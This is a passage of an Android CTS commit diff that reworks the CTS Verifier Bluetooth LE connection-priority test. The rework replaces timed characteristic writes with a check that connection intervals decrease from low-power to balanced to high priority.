diff options
| author | android-build-team Robot <android-build-team-robot@google.com> | 2019-08-22 03:25:21 +0000 |
|---|---|---|
| committer | android-build-team Robot <android-build-team-robot@google.com> | 2019-08-22 03:25:21 +0000 |
| commit | 782fcc5df6606cd4b56b61af5f91c8a6e63e25fd (patch) | |
| tree | 65807391c77c27fe3aa4da927b3256cdbe8364b1 | |
| parent | a2442683f5dc3af1f09b745f193918732f6ae843 (diff) | |
| parent | 929d37ce36e5644befcf3c272901ca02002808b9 (diff) | |
| download | cts-android10-c2f2-s2-release.tar.gz | |
Snap for 5821701 from 929d37ce36e5644befcf3c272901ca02002808b9 to qt-c2f2-releaseandroid-10.0.0_r9android-10.0.0_r8android-10.0.0_r7android-10.0.0_r14android-10.0.0_r13android-10.0.0_r12android10-c2f2-s2-releaseandroid10-c2f2-s1-releaseandroid10-c2f2-release
Change-Id: Iee003096e000361a1e1285c3db50ad6ed168b2bf
13 files changed, 517 insertions, 494 deletions
diff --git a/apps/CtsVerifier/res/values/strings.xml b/apps/CtsVerifier/res/values/strings.xml index aac13a4357d..4997482db17 100755 --- a/apps/CtsVerifier/res/values/strings.xml +++ b/apps/CtsVerifier/res/values/strings.xml @@ -551,10 +551,7 @@ <string name="ble_scan_stop">Stop scan</string> <!-- BLE connection priority test strings --> - <string name="ble_client_connection_priority">Testing priority: </string> - <string name="ble_connection_priority_balanced">BALANCED</string> - <string name="ble_connection_priority_high">HIGH</string> - <string name="ble_connection_priority_low">LOW</string> + <string name="ble_client_connection_priority">Testing connection priority switching </string> <string name="ble_server_connection_priority_result_passed">All test passed</string> <string name="ble_server_connection_priority_result_failed">Test failed.</string> <string name="ble_server_connection_priority_result_intervals"> @@ -582,9 +579,7 @@ <string name="ble_write_authenticated_characteristic_name">Bluetooth LE Write Encrypted Characteristic</string> <string name="ble_read_authenticated_descriptor_name">Bluetooth LE Read Encrypted Descriptor</string> <string name="ble_write_authenticated_descriptor_name">Bluetooth LE Write Encrypted Descriptor</string> - <string name="ble_connection_priority_client_high">Bluetooth LE Send With CONNECTION_PRIORITY_HIGH</string> - <string name="ble_connection_priority_client_low">Bluetooth LE Send With CONNECTION_PRIORITY_LOW_POWER</string> - <string name="ble_connection_priority_client_balanced">Bluetooth LE Send With CONNECTION_PRIORITY_BALANCED</string> + <string name="ble_connection_priority_client_description">Client Switching Connection Priority</string> <string name="ble_indicate_characteristic_name">Bluetooth LE Indicate Characteristic</string> <string name="ble_encrypted_client_name">03 Bluetooth LE Encrypted Client Test</string> <string name="ble_encrypted_client_info">Bluetooth LE Encrypted Client read/write on characteristic and descriptor need encrypted.</string> diff --git a/apps/CtsVerifier/src/com/android/cts/verifier/bluetooth/BleConnectionPriorityClientBaseActivity.java b/apps/CtsVerifier/src/com/android/cts/verifier/bluetooth/BleConnectionPriorityClientBaseActivity.java index 47ea81fc241..9119aae6888 100644 --- a/apps/CtsVerifier/src/com/android/cts/verifier/bluetooth/BleConnectionPriorityClientBaseActivity.java +++ b/apps/CtsVerifier/src/com/android/cts/verifier/bluetooth/BleConnectionPriorityClientBaseActivity.java @@ -40,17 +40,12 @@ import java.util.List; public class BleConnectionPriorityClientBaseActivity extends PassFailButtons.Activity {
private TestAdapter mTestAdapter;
- private int mPassed = 0;
+ private boolean mPassed = false;
private Dialog mDialog;
- private static final int BLE_CONNECTION_HIGH = 0;
- private static final int BLE_CONNECTION_BALANCED = 1;
- private static final int BLE_CONNECTION_LOW = 2;
+ private static final int BLE_CONNECTION_UPDATE = 0;
- private static final int PASSED_HIGH = 0x1;
- private static final int PASSED_BALANCED = 0x2;
- private static final int PASSED_LOW = 0x4;
- private static final int ALL_PASSED = 0x7;
+ private static final int ALL_PASSED = 0x1;
private boolean mSecure;
@@ -80,9 +75,7 @@ public class BleConnectionPriorityClientBaseActivity extends PassFailButtons.Act IntentFilter filter = new IntentFilter();
filter.addAction(BleConnectionPriorityClientService.ACTION_BLUETOOTH_DISABLED);
filter.addAction(BleConnectionPriorityClientService.ACTION_CONNECTION_SERVICES_DISCOVERED);
- filter.addAction(BleConnectionPriorityClientService.ACTION_FINISH_CONNECTION_PRIORITY_HIGH);
- filter.addAction(BleConnectionPriorityClientService.ACTION_FINISH_CONNECTION_PRIORITY_BALANCED);
- filter.addAction(BleConnectionPriorityClientService.ACTION_FINISH_CONNECTION_PRIORITY_LOW_POWER);
+ filter.addAction(BleConnectionPriorityClientService.ACTION_CONNECTION_PRIORITY_FINISH);
filter.addAction(BleConnectionPriorityClientService.ACTION_BLUETOOTH_MISMATCH_SECURE);
filter.addAction(BleConnectionPriorityClientService.ACTION_BLUETOOTH_MISMATCH_INSECURE);
filter.addAction(BleConnectionPriorityClientService.ACTION_FINISH_DISCONNECT);
@@ -140,9 +133,7 @@ public class BleConnectionPriorityClientBaseActivity extends PassFailButtons.Act private List<Integer> setupTestList() {
ArrayList<Integer> testList = new ArrayList<Integer>();
- testList.add(R.string.ble_connection_priority_client_high);
- testList.add(R.string.ble_connection_priority_client_balanced);
- testList.add(R.string.ble_connection_priority_client_low);
+ testList.add(R.string.ble_connection_priority_client_description);
return testList;
}
@@ -157,44 +148,24 @@ public class BleConnectionPriorityClientBaseActivity extends PassFailButtons.Act private void executeNextTestImpl() {
switch (mCurrentTest) {
case -1: {
- mCurrentTest = BLE_CONNECTION_HIGH;
+ mCurrentTest = BLE_CONNECTION_UPDATE;
Intent intent = new Intent(this, BleConnectionPriorityClientService.class);
- intent.setAction(BleConnectionPriorityClientService.ACTION_CONNECTION_PRIORITY_HIGH);
+ intent.setAction(BleConnectionPriorityClientService.ACTION_CONNECTION_PRIORITY_START);
startService(intent);
- String msg = getString(R.string.ble_client_connection_priority)
- + getString(R.string.ble_connection_priority_high);
+ String msg = getString(R.string.ble_client_connection_priority);
Toast.makeText(getApplicationContext(), msg, Toast.LENGTH_LONG).show();
}
break;
- case BLE_CONNECTION_BALANCED: {
- mCurrentTest = BLE_CONNECTION_LOW;
- Intent intent = new Intent(this, BleConnectionPriorityClientService.class);
- intent.setAction(BleConnectionPriorityClientService.ACTION_CONNECTION_PRIORITY_LOW_POWER);
- startService(intent);
- String msg = getString(R.string.ble_client_connection_priority)
- + getString(R.string.ble_connection_priority_low);
- Toast.makeText(getApplicationContext(), msg, Toast.LENGTH_LONG).show();
- }
- break;
- case BLE_CONNECTION_HIGH: {
- mCurrentTest = BLE_CONNECTION_BALANCED;
- Intent intent = new Intent(this, BleConnectionPriorityClientService.class);
- intent.setAction(BleConnectionPriorityClientService.ACTION_CONNECTION_PRIORITY_BALANCED);
- startService(intent);
- String msg = getString(R.string.ble_client_connection_priority)
- + getString(R.string.ble_connection_priority_balanced);
- Toast.makeText(getApplicationContext(), msg, Toast.LENGTH_LONG).show();
- }
- break;
- case BLE_CONNECTION_LOW:
+ case BLE_CONNECTION_UPDATE: {
// all test done
closeDialog();
- if (mPassed == ALL_PASSED) {
+ if (mPassed == true) {
Intent intent = new Intent(this, BleConnectionPriorityClientService.class);
intent.setAction(BleConnectionPriorityClientService.ACTION_DISCONNECT);
startService(intent);
}
break;
+ }
default:
// something went wrong
closeDialog();
@@ -227,21 +198,11 @@ public class BleConnectionPriorityClientBaseActivity extends PassFailButtons.Act showProgressDialog();
executeNextTest(3000);
break;
- case BleConnectionPriorityClientService.ACTION_FINISH_CONNECTION_PRIORITY_HIGH:
- mTestAdapter.setTestPass(BLE_CONNECTION_HIGH);
- mPassed |= PASSED_HIGH;
+ case BleConnectionPriorityClientService.ACTION_CONNECTION_PRIORITY_FINISH:
+ mTestAdapter.setTestPass(BLE_CONNECTION_UPDATE);
+ mPassed = true;
executeNextTest(1000);
break;
- case BleConnectionPriorityClientService.ACTION_FINISH_CONNECTION_PRIORITY_BALANCED:
- mTestAdapter.setTestPass(BLE_CONNECTION_BALANCED);
- mPassed |= PASSED_BALANCED;
- executeNextTest(1000);
- break;
- case BleConnectionPriorityClientService.ACTION_FINISH_CONNECTION_PRIORITY_LOW_POWER:
- mTestAdapter.setTestPass(BLE_CONNECTION_LOW);
- mPassed |= PASSED_LOW;
- executeNextTest(100);
- break;
case BleConnectionPriorityClientService.ACTION_BLUETOOTH_MISMATCH_SECURE:
showErrorDialog(R.string.ble_bluetooth_mismatch_title, R.string.ble_bluetooth_mismatch_secure_message, true);
break;
diff --git a/apps/CtsVerifier/src/com/android/cts/verifier/bluetooth/BleConnectionPriorityClientService.java b/apps/CtsVerifier/src/com/android/cts/verifier/bluetooth/BleConnectionPriorityClientService.java index 38d37bd6f21..1df40f55528 100644 --- a/apps/CtsVerifier/src/com/android/cts/verifier/bluetooth/BleConnectionPriorityClientService.java +++ b/apps/CtsVerifier/src/com/android/cts/verifier/bluetooth/BleConnectionPriorityClientService.java @@ -62,19 +62,11 @@ public class BleConnectionPriorityClientService extends Service { public static final String ACTION_BLUETOOTH_MISMATCH_INSECURE =
"com.android.cts.verifier.bluetooth.action.ACTION_BLUETOOTH_MISMATCH_INSECURE";
- public static final String ACTION_CONNECTION_PRIORITY_BALANCED =
- "com.android.cts.verifier.bluetooth.action.CONNECTION_PRIORITY_BALANCED";
- public static final String ACTION_CONNECTION_PRIORITY_HIGH =
- "com.android.cts.verifier.bluetooth.action.CONNECTION_PRIORITY_HIGH";
- public static final String ACTION_CONNECTION_PRIORITY_LOW_POWER =
+ public static final String ACTION_CONNECTION_PRIORITY_START =
"com.android.cts.verifier.bluetooth.action.CONNECTION_PRIORITY_LOW_POWER";
- public static final String ACTION_FINISH_CONNECTION_PRIORITY_BALANCED =
- "com.android.cts.verifier.bluetooth.action.FINISH_CONNECTION_PRIORITY_BALANCED";
- public static final String ACTION_FINISH_CONNECTION_PRIORITY_HIGH =
- "com.android.cts.verifier.bluetooth.action.FINISH_CONNECTION_PRIORITY_HIGH";
- public static final String ACTION_FINISH_CONNECTION_PRIORITY_LOW_POWER =
- "com.android.cts.verifier.bluetooth.action.FINISH_CONNECTION_PRIORITY_LOW_POWER";
+ public static final String ACTION_CONNECTION_PRIORITY_FINISH =
+ "com.android.cts.verifier.bluetooth.action.CONNECTION_PRIORITY_FINISH";
public static final String ACTION_CLIENT_CONNECT_SECURE =
"com.android.cts.verifier.bluetooth.action.CLIENT_CONNECT_SECURE";
@@ -84,20 +76,7 @@ public class BleConnectionPriorityClientService extends Service { public static final String ACTION_FINISH_DISCONNECT =
"com.android.cts.verifier.bluetooth.action.FINISH_DISCONNECT";
- public static final long DEFAULT_INTERVAL = 100L;
- public static final long DEFAULT_PERIOD = 10000L;
-
- // this string will be used at writing test and connection priority test.
- private static final String WRITE_VALUE = "TEST";
-
- private static final UUID SERVICE_UUID =
- UUID.fromString("00009999-0000-1000-8000-00805f9b34fb");
- private static final UUID CHARACTERISTIC_UUID =
- UUID.fromString("00009998-0000-1000-8000-00805f9b34fb");
- private static final UUID START_CHARACTERISTIC_UUID =
- UUID.fromString("00009997-0000-1000-8000-00805f9b34fb");
- private static final UUID STOP_CHARACTERISTIC_UUID =
- UUID.fromString("00009995-0000-1000-8000-00805f9b34fb");
+ public static final int NOT_UNDER_TEST = -1;
private BluetoothManager mBluetoothManager;
private BluetoothAdapter mBluetoothAdapter;
@@ -108,13 +87,12 @@ public class BleConnectionPriorityClientService extends Service { private Context mContext;
private String mAction;
- private long mInterval;
- private long mPeriod;
- private Date mStartDate;
- private int mWriteCount;
private boolean mSecure;
- private String mPriority;
+ private int mPriority = NOT_UNDER_TEST;
+ private int interval_low = 0;
+ private int interval_balanced = 0;
+ private int interval_high = 0;
private TestTaskQueue mTaskQueue;
@@ -129,8 +107,6 @@ public class BleConnectionPriorityClientService extends Service { mScanner = mBluetoothAdapter.getBluetoothLeScanner();
mHandler = new Handler();
mContext = this;
- mInterval = DEFAULT_INTERVAL;
- mPeriod = DEFAULT_PERIOD;
startScan();
}
@@ -171,15 +147,8 @@ public class BleConnectionPriorityClientService extends Service { case ACTION_CLIENT_CONNECT_SECURE:
mSecure = true;
break;
- case ACTION_CONNECTION_PRIORITY_BALANCED:
- case ACTION_CONNECTION_PRIORITY_HIGH:
- case ACTION_CONNECTION_PRIORITY_LOW_POWER:
- mTaskQueue.addTask(new Runnable() {
- @Override
- public void run() {
- startPeriodicTransmission();
- }
- });
+ case ACTION_CONNECTION_PRIORITY_START:
+ myRequestConnectionPriority(BluetoothGatt.CONNECTION_PRIORITY_LOW_POWER);
break;
case ACTION_DISCONNECT:
if (mBluetoothGatt != null) {
@@ -194,120 +163,17 @@ public class BleConnectionPriorityClientService extends Service { return START_NOT_STICKY;
}
- private void startPeriodicTransmission() {
- mWriteCount = 0;
-
- // Set connection priority
- switch (mAction) {
- case ACTION_CONNECTION_PRIORITY_BALANCED:
- mPriority = BleConnectionPriorityServerService.CONNECTION_PRIORITY_BALANCED;
- mBluetoothGatt.requestConnectionPriority(BluetoothGatt.CONNECTION_PRIORITY_BALANCED);
- break;
- case ACTION_CONNECTION_PRIORITY_HIGH:
- mPriority = BleConnectionPriorityServerService.CONNECTION_PRIORITY_HIGH;
- mBluetoothGatt.requestConnectionPriority(BluetoothGatt.CONNECTION_PRIORITY_HIGH);
- break;
- case ACTION_CONNECTION_PRIORITY_LOW_POWER:
- mPriority = BleConnectionPriorityServerService.CONNECTION_PRIORITY_LOW_POWER;
- mBluetoothGatt.requestConnectionPriority(BluetoothGatt.CONNECTION_PRIORITY_LOW_POWER);
- break;
- default:
- mPriority = BleConnectionPriorityServerService.CONNECTION_PRIORITY_BALANCED;
- mBluetoothGatt.requestConnectionPriority(BluetoothGatt.CONNECTION_PRIORITY_BALANCED);
- break;
- }
-
- // Create Timer for Periodic transmission
- mStartDate = new Date();
- TimerTask task = new TimerTask() {
- @Override
- public void run() {
- if (mBluetoothGatt == null) {
- if (DEBUG) {
- Log.d(TAG, "BluetoothGatt is null, return");
- }
- return;
- }
-
- Date currentData = new Date();
- if ((currentData.getTime() - mStartDate.getTime()) >= mPeriod) {
- if (mConnectionTimer != null) {
- mConnectionTimer.cancel();
- mConnectionTimer = null;
- }
- // The STOP_CHARACTERISTIC_UUID is critical in syncing the client and server
- // states. Delay the write by 2 seconds to improve the chance of this
- // characteristic going through. Consider changing the code to use callbacks
- // in the future to make it more robust.
- sleep(2000);
- // write termination data (contains current priority and number of messages wrote)
- String msg = "" + mPriority + "," + mWriteCount;
- writeCharacteristic(STOP_CHARACTERISTIC_UUID, msg);
- sleep(1000);
- Intent intent = new Intent();
- switch (mPriority) {
- case BleConnectionPriorityServerService.CONNECTION_PRIORITY_BALANCED:
- intent.setAction(ACTION_FINISH_CONNECTION_PRIORITY_BALANCED);
- break;
- case BleConnectionPriorityServerService.CONNECTION_PRIORITY_HIGH:
- intent.setAction(ACTION_FINISH_CONNECTION_PRIORITY_HIGH);
- break;
- case BleConnectionPriorityServerService.CONNECTION_PRIORITY_LOW_POWER:
- intent.setAction(ACTION_FINISH_CONNECTION_PRIORITY_LOW_POWER);
- break;
- }
- sendBroadcast(intent);
- }
-
- if (mConnectionTimer != null) {
- // write testing data
- ++mWriteCount;
- writeCharacteristic(CHARACTERISTIC_UUID, WRITE_VALUE);
- }
- }
- };
-
- // write starting data
- writeCharacteristic(START_CHARACTERISTIC_UUID, mPriority);
-
- // start sending
- sleep(1000);
- mConnectionTimer = new Timer();
- mConnectionTimer.schedule(task, 0, mInterval);
- }
-
- private BluetoothGattService getService() {
- BluetoothGattService service = null;
-
- if (mBluetoothGatt != null) {
- service = mBluetoothGatt.getService(SERVICE_UUID);
- if (service == null) {
- showMessage("Service not found");
- }
- }
- return service;
+ private void myRequestConnectionPriority(final int priority) {
+ mTaskQueue.addTask(new Runnable() {
+ @Override
+ public void run() {
+ mPriority = priority;
+ mBluetoothGatt.requestConnectionPriority(mPriority);
+ //continue in onConnectionUpdated() callback
+ }
+ });
}
- private BluetoothGattCharacteristic getCharacteristic(UUID uuid) {
- BluetoothGattCharacteristic characteristic = null;
-
- BluetoothGattService service = getService();
- if (service != null) {
- characteristic = service.getCharacteristic(uuid);
- if (characteristic == null) {
- showMessage("Characteristic not found");
- }
- }
- return characteristic;
- }
-
- private void writeCharacteristic(UUID uid, String writeValue) {
- BluetoothGattCharacteristic characteristic = getCharacteristic(uid);
- if (characteristic != null){
- characteristic.setValue(writeValue);
- mBluetoothGatt.writeCharacteristic(characteristic);
- }
- }
private void sleep(int millis) {
try {
@@ -372,19 +238,56 @@ public class BleConnectionPriorityClientService extends Service { if (DEBUG){
Log.d(TAG, "onServiceDiscovered");
}
- if ((status == BluetoothGatt.GATT_SUCCESS) && (mBluetoothGatt.getService(SERVICE_UUID) != null)) {
+ if (status == BluetoothGatt.GATT_SUCCESS) {
showMessage("Service discovered");
Intent intent = new Intent(ACTION_CONNECTION_SERVICES_DISCOVERED);
sendBroadcast(intent);
}
+
+ //onConnectionUpdated is hidden callback, can't be marked as @Override.
+ // We must have a call to it, otherwise compiler will delete it during optimization.
+ if (status == 0xFFEFFEE) {
+ // This should never execute, but will make compiler not remove onConnectionUpdated
+ onConnectionUpdated(null, 0, 0, 0, 0);
+ throw new IllegalStateException("This should never happen!");
+ }
}
+
+ // @Override uncomment once this becomes public API
+ public void onConnectionUpdated(BluetoothGatt gatt, int interval, int latency, int timeout,
+ int status) {
+ if (mPriority == NOT_UNDER_TEST) return;
+
+ if (status != 0) {
+ showMessage("onConnectionUpdated() error, status=" + status );
+ Log.e(TAG, "onConnectionUpdated() status=" + status);
+ return;
+ }
- @Override
- public void onCharacteristicWrite(BluetoothGatt gatt, BluetoothGattCharacteristic characteristic, int status) {
- String value = characteristic.getStringValue(0);
- UUID uid = characteristic.getUuid();
- if (DEBUG) {
- Log.d(TAG, "onCharacteristicWrite: characteristic.val=" + value + " status=" + status + " uid=" + uid);
+ Log.i(TAG, "onConnectionUpdated() status=" + status + ", interval=" + interval);
+ if (mPriority == BluetoothGatt.CONNECTION_PRIORITY_LOW_POWER) {
+ interval_low = interval;
+ myRequestConnectionPriority(BluetoothGatt.CONNECTION_PRIORITY_BALANCED);
+ } else if (mPriority == BluetoothGatt.CONNECTION_PRIORITY_BALANCED) {
+ interval_balanced = interval;
+ myRequestConnectionPriority(BluetoothGatt.CONNECTION_PRIORITY_HIGH);
+ } else if (mPriority == BluetoothGatt.CONNECTION_PRIORITY_HIGH) {
+ interval_high = interval;
+
+ if (interval_low < interval_balanced || interval_balanced < interval_high) {
+ showMessage("interval value should be descending - failure!");
+ Log.e(TAG, "interval values should be descending: interval_low=" + interval_low +
+ ", interval_balanced=" + interval_balanced + ", interval_high=" + interval_high);
+ return;
+ }
+
+ showMessage("intervals: " + interval_low +" > " + interval_balanced + " > " + interval_high);
+
+ Intent intent = new Intent();
+ intent.setAction(ACTION_CONNECTION_PRIORITY_FINISH);
+ sendBroadcast(intent);
+
+ mPriority = NOT_UNDER_TEST;
}
}
};
diff --git a/apps/CtsVerifier/src/com/android/cts/verifier/bluetooth/BleConnectionPriorityServerBaseActivity.java b/apps/CtsVerifier/src/com/android/cts/verifier/bluetooth/BleConnectionPriorityServerBaseActivity.java index c0a2f098f6d..66e068e00d0 100644 --- a/apps/CtsVerifier/src/com/android/cts/verifier/bluetooth/BleConnectionPriorityServerBaseActivity.java +++ b/apps/CtsVerifier/src/com/android/cts/verifier/bluetooth/BleConnectionPriorityServerBaseActivity.java @@ -37,12 +37,6 @@ import java.util.List; public class BleConnectionPriorityServerBaseActivity extends PassFailButtons.Activity {
public static final int CONNECTION_PRIORITY_HIGH = 0;
- public static final int CONNECTION_PRIORITY_BALANCED = 1;
- public static final int CONNECTION_PRIORITY_LOW_POWER = 2;
-
- private long mAverageBalanced = -1;
- private long mAverageHigh = -1;
- private long mAverageLow = -1;
private TestAdapter mTestAdapter;
@@ -71,10 +65,7 @@ public class BleConnectionPriorityServerBaseActivity extends PassFailButtons.Act IntentFilter filter = new IntentFilter();
filter.addAction(BleConnectionPriorityServerService.ACTION_BLUETOOTH_DISABLED);
- filter.addAction(BleConnectionPriorityServerService.ACTION_CONNECTION_WRITE_REQUEST);
- filter.addAction(BleConnectionPriorityServerService.ACTION_FINICH_CONNECTION_PRIORITY_HIGHT);
- filter.addAction(BleConnectionPriorityServerService.ACTION_FINICH_CONNECTION_PRIORITY_BALANCED);
- filter.addAction(BleConnectionPriorityServerService.ACTION_FINICH_CONNECTION_PRIORITY_LOW);
+ filter.addAction(BleConnectionPriorityServerService.ACTION_CONNECTION_PRIORITY_FINISH);
filter.addAction(BleServerService.BLE_ADVERTISE_UNSUPPORTED);
filter.addAction(BleServerService.BLE_OPEN_FAIL);
filter.addAction(BleConnectionPriorityServerService.ACTION_START_CONNECTION_PRIORITY_TEST);
@@ -90,9 +81,7 @@ public class BleConnectionPriorityServerBaseActivity extends PassFailButtons.Act private List<Integer> setupTestList() {
ArrayList<Integer> testList = new ArrayList<Integer>();
- testList.add(R.string.ble_connection_priority_client_high);
- testList.add(R.string.ble_connection_priority_client_balanced);
- testList.add(R.string.ble_connection_priority_client_low);
+ testList.add(R.string.ble_connection_priority_client_description);
return testList;
}
@@ -130,8 +119,8 @@ public class BleConnectionPriorityServerBaseActivity extends PassFailButtons.Act private BroadcastReceiver mBroadcast = new BroadcastReceiver() {
@Override
public void onReceive(Context context, Intent intent) {
+ boolean passedAll = false;
String action = intent.getAction();
- long average = intent.getLongExtra(BleConnectionPriorityServerService.EXTRA_AVERAGE, -1);
switch (action) {
case BleConnectionPriorityServerService.ACTION_BLUETOOTH_DISABLED:
new AlertDialog.Builder(context)
@@ -148,64 +137,12 @@ public class BleConnectionPriorityServerBaseActivity extends PassFailButtons.Act case BleConnectionPriorityServerService.ACTION_START_CONNECTION_PRIORITY_TEST:
showProgressDialog();
break;
- case BleConnectionPriorityServerService.ACTION_FINICH_CONNECTION_PRIORITY_HIGHT:
- mAverageHigh = average;
- mAverageBalanced = -1;
- mAverageLow = -1;
- break;
- case BleConnectionPriorityServerService.ACTION_FINICH_CONNECTION_PRIORITY_BALANCED:
- mAverageBalanced = average;
- break;
- case BleConnectionPriorityServerService.ACTION_FINICH_CONNECTION_PRIORITY_LOW:
- mAverageLow = average;
- break;
- case BleServerService.BLE_OPEN_FAIL:
- setTestResultAndFinish(false);
- runOnUiThread(new Runnable() {
- @Override
- public void run() {
- Toast.makeText(BleConnectionPriorityServerBaseActivity.this, R.string.bt_open_failed_message, Toast.LENGTH_SHORT).show();
- }
- });
- break;
- case BleServerService.BLE_ADVERTISE_UNSUPPORTED:
- showErrorDialog(R.string.bt_advertise_unsupported_title, R.string.bt_advertise_unsupported_message, true);
- break;
- }
+ case BleConnectionPriorityServerService.ACTION_CONNECTION_PRIORITY_FINISH:
+ String resultMsg = getString(R.string.ble_server_connection_priority_result_passed);
- boolean passedHigh = (mAverageHigh >= 0);
- boolean passedAll = false;
+ closeDialog();
- if (passedHigh) {
mTestAdapter.setTestPass(CONNECTION_PRIORITY_HIGH);
- }
-
- if (passedHigh && (mAverageLow >= 0) && (mAverageBalanced >= 0)) {
- boolean passedBalanced = (mAverageHigh <= mAverageBalanced);
- boolean passedLow = (mAverageBalanced <= mAverageLow);
-
- if (passedBalanced) {
- mTestAdapter.setTestPass(CONNECTION_PRIORITY_BALANCED);
- }
- if (passedLow) {
- mTestAdapter.setTestPass(CONNECTION_PRIORITY_LOW_POWER);
- }
-
- String resultMsg;
- if (passedBalanced && passedLow) {
- resultMsg = getString(R.string.ble_server_connection_priority_result_passed);
- passedAll = true;
- } else {
- String detailsMsg = String.format(getString(R.string.ble_server_connection_priority_result_intervals),
- mAverageHigh,
- mAverageBalanced,
- mAverageLow);
- resultMsg = getString(R.string.ble_server_connection_priority_result_failed)
- + "\n\n"
- + detailsMsg;
- }
-
- closeDialog();
mDialog = new AlertDialog.Builder(BleConnectionPriorityServerBaseActivity.this)
.setMessage(resultMsg)
.setPositiveButton(android.R.string.ok, new DialogInterface.OnClickListener() {
@@ -222,10 +159,25 @@ public class BleConnectionPriorityServerBaseActivity extends PassFailButtons.Act })
.create();
mDialog.show();
+
+ getPassButton().setEnabled(true);
+ mTestAdapter.notifyDataSetChanged();
+ break;
+
+ case BleServerService.BLE_OPEN_FAIL:
+ setTestResultAndFinish(false);
+ runOnUiThread(new Runnable() {
+ @Override
+ public void run() {
+ Toast.makeText(BleConnectionPriorityServerBaseActivity.this, R.string.bt_open_failed_message, Toast.LENGTH_SHORT).show();
+ }
+ });
+ break;
+ case BleServerService.BLE_ADVERTISE_UNSUPPORTED:
+ showErrorDialog(R.string.bt_advertise_unsupported_title, R.string.bt_advertise_unsupported_message, true);
+ break;
}
- getPassButton().setEnabled(passedAll);
- mTestAdapter.notifyDataSetChanged();
}
};
diff --git a/apps/CtsVerifier/src/com/android/cts/verifier/bluetooth/BleConnectionPriorityServerService.java b/apps/CtsVerifier/src/com/android/cts/verifier/bluetooth/BleConnectionPriorityServerService.java index e1e4eedc2c3..ccffcdb9d25 100644 --- a/apps/CtsVerifier/src/com/android/cts/verifier/bluetooth/BleConnectionPriorityServerService.java +++ b/apps/CtsVerifier/src/com/android/cts/verifier/bluetooth/BleConnectionPriorityServerService.java @@ -45,43 +45,16 @@ import java.util.UUID; public class BleConnectionPriorityServerService extends Service {
public static final boolean DEBUG = true;
public static final String TAG = "BlePriorityServer";
- private static final String RESET_COUNT_VALUE = "RESET";
- private static final String START_VALUE = "START";
- private static final String STOP_VALUE = "STOP";
- public static final String CONNECTION_PRIORITY_HIGH = "PR_H";
- public static final String CONNECTION_PRIORITY_BALANCED = "PR_B";
- public static final String CONNECTION_PRIORITY_LOW_POWER = "PR_L";
public static final String ACTION_BLUETOOTH_DISABLED =
"com.android.cts.verifier.bluetooth.action.BLUETOOTH_DISABLED";
- public static final String ACTION_CONNECTION_WRITE_REQUEST =
- "com.android.cts.verifier.bluetooth.action.CONNECTION_WRITE_REQUEST";
- public static final String EXTRA_REQUEST_COUNT =
- "com.android.cts.verifier.bluetooth.intent.EXTRA_REQUEST_COUNT";
- public static final String ACTION_FINICH_CONNECTION_PRIORITY_HIGHT =
- "com.android.cts.verifier.bluetooth.action.ACTION_FINICH_CONNECTION_PRIORITY_HIGHT";
- public static final String ACTION_FINICH_CONNECTION_PRIORITY_BALANCED =
- "com.android.cts.verifier.bluetooth.action.ACTION_FINICH_CONNECTION_PRIORITY_BALANCED";
- public static final String ACTION_FINICH_CONNECTION_PRIORITY_LOW =
- "com.android.cts.verifier.bluetooth.action.ACTION_FINICH_CONNECTION_PRIORITY_LOW";
+ public static final String ACTION_CONNECTION_PRIORITY_FINISH =
+ "com.android.cts.verifier.bluetooth.action.ACTION_CONNECTION_PRIORITY_FINISH";
public static final String ACTION_START_CONNECTION_PRIORITY_TEST =
"com.android.cts.verifier.bluetooth.action.ACTION_START_CONNECTION_PRIORITY_TEST";
- public static final String EXTRA_AVERAGE =
- "com.android.cts.verifier.bluetooth.intent.EXTRA_AVERAGE";
-
- private static final UUID SERVICE_UUID =
- UUID.fromString("00009999-0000-1000-8000-00805f9b34fb");
- private static final UUID CHARACTERISTIC_UUID =
- UUID.fromString("00009998-0000-1000-8000-00805f9b34fb");
- private static final UUID START_CHARACTERISTIC_UUID =
- UUID.fromString("00009997-0000-1000-8000-00805f9b34fb");
- private static final UUID STOP_CHARACTERISTIC_UUID =
- UUID.fromString("00009995-0000-1000-8000-00805f9b34fb");
- private static final UUID DESCRIPTOR_UUID =
- UUID.fromString("00009996-0000-1000-8000-00805f9b34fb");
public static final UUID ADV_SERVICE_UUID=
UUID.fromString("00002222-0000-1000-8000-00805f9b34fb");
@@ -92,8 +65,10 @@ public class BleConnectionPriorityServerService extends Service { private Handler mHandler;
private BluetoothLeAdvertiser mAdvertiser;
private long mReceiveWriteCount;
- private Timer mTimeoutTimer;
- private TimerTask mTimeoutTimerTask;
+
+ private int interval_low = 0;
+ private int interval_balanced = 0;
+ private int interval_high = 0;
@Override
public void onCreate() {
@@ -102,10 +77,6 @@ public class BleConnectionPriorityServerService extends Service { mBluetoothManager = (BluetoothManager) getSystemService(Context.BLUETOOTH_SERVICE);
mAdvertiser = mBluetoothManager.getAdapter().getBluetoothLeAdvertiser();
mGattServer = mBluetoothManager.openGattServer(this, mCallbacks);
- mService = createService();
- if ((mGattServer != null) && (mAdvertiser != null)) {
- mGattServer.addService(mService);
- }
mDevice = null;
mHandler = new Handler();
@@ -124,14 +95,6 @@ public class BleConnectionPriorityServerService extends Service { public void onDestroy() {
super.onDestroy();
- cancelTimeoutTimer(false);
-
- if (mTimeoutTimer != null) {
- mTimeoutTimer.cancel();
- mTimeoutTimer = null;
- }
- mTimeoutTimerTask = null;
-
stopAdvertise();
if (mGattServer == null) {
return;
@@ -194,21 +157,6 @@ public class BleConnectionPriorityServerService extends Service { }
}
- private void notifyServiceAdded() {
- if (DEBUG) {
- Log.d(TAG, "notifyServiceAdded");
- }
- }
-
- private void notifyCharacteristicWriteRequest() {
- if (DEBUG) {
- Log.d(TAG, "notifyCharacteristicWriteRequest");
- }
- Intent intent = new Intent(ACTION_CONNECTION_WRITE_REQUEST);
- intent.putExtra(EXTRA_REQUEST_COUNT, String.valueOf(mReceiveWriteCount));
- sendBroadcast(intent);
- }
-
private void showMessage(final String msg) {
mHandler.post(new Runnable() {
@Override
@@ -218,38 +166,6 @@ public class BleConnectionPriorityServerService extends Service { });
}
- private synchronized void cancelTimeoutTimer(boolean runTimeout) {
- if (mTimeoutTimerTask != null) {
- mTimeoutTimer.cancel();
- if (runTimeout) {
- mTimeoutTimerTask.run();
- }
- mTimeoutTimerTask = null;
- mTimeoutTimer = null;
- }
- }
-
- private BluetoothGattService createService() {
- BluetoothGattService service =
- new BluetoothGattService(SERVICE_UUID, BluetoothGattService.SERVICE_TYPE_PRIMARY);
- // add characteristic to service
- // property: 0x0A (read, write)
- // permission: 0x11 (read, write)
